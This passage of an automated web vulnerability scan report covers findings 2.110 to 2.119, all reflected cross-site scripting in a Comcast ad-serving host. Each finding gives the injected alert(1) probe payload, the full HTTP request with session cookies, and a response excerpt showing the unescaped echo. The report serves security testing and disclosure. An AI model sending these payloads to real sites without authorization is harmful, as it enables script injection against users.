2.110. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57d17"><script>alert(1)</script>cff26d6cff1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network57d17"><script>alert(1)</script>cff26d6cff1/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1445
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network57d17"><script>alert(1)</script>cff26d6cff1/202236386/L17/1983654328/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.111. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 171b6"%3b637bcacedc8 was submitted in the REST URL parameter 5. This input was echoed as 171b6";637bcacedc8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network171b6"%3b637bcacedc8/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1395
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network171b6";637bcacedc8/202236386/L17/1178633365/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFla
...[SNIP]...

2.112. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18e77"><script>alert(1)</script>bef770f05c3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/20223638618e77"><script>alert(1)</script>bef770f05c3/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1443
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/20223638618e77"><script>alert(1)</script>bef770f05c3/L17/964926435/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.113. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e88e"-alert(1)-"53982542345 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/2022363867e88e"-alert(1)-"53982542345/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1413
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network/2022363867e88e"-alert(1)-"53982542345/L17/196666583/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK
...[SNIP]...

2.114. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a574f"><script>alert(1)</script>34133688c6e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17a574f"><script>alert(1)</script>34133688c6e/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1447
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17a574f"><script>alert(1)</script>34133688c6e/L/856912946/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.115. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5a9a"-alert(1)-"e60a8a7472b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17b5a9a"-alert(1)-"e60a8a7472b/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1419
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network/202236386/L17b5a9a"-alert(1)-"e60a8a7472b/L/2133113156/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK
...[SNIP]...

2.116. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d61ce"-alert(1)-"5ab7386432 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32d61ce"-alert(1)-"5ab7386432/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1440
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/RealMedia/ads/click_lx.ads/yahoo.comcast.net/network/202236386/L17/1279528946/x32d61ce"-alert(1)-"5ab7386432/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a;zip=US:77002";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK ;
var TFSMFlash_
...[SNIP]...

2.117. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70249"><img%20src%3da%20onerror%3dalert(1)>74ca705f798 was submitted in the REST URL parameter 9. This input was echoed as 70249"><img src=a onerror=alert(1)>74ca705f798 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x3270249"><img%20src%3da%20onerror%3dalert(1)>74ca705f798/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1495
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/190952221/x3270249"><img src=a onerror=alert(1)>74ca705f798/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.118. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a1e9"><script>alert(1)</script>5881f5fc9eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1621451620/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?9a1e9"><script>alert(1)</script>5881f5fc9eb=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1404
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="6";
var TFSMFlash_WMODE="window";
var TFSMFlash_OASCLICK="http://oascentral.comcast.net/R
...[SNIP]...
RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/network/202236386/L17/1157883388/x32/Comcast/MostynLaw_201012_SIG_300_HOU_B/300x250_FLA_Mostyn_07022010.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&9a1e9"><script>alert(1)</script>5881f5fc9eb=1" WIDTH=2 HEIGHT=2>

2.119. http://oascentral.comcast.net/RealMedia/ads/adstream_sx.cgi/comcast.net/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_sx.cgi/comcast.net/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf35b"><script>alert(1)</script>49f7dfd6bf9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.cgi/comcast.netbf35b"><script>alert(1)</script>49f7dfd6bf9/ HTTP/1.1
Host: oascentral.comcast.net
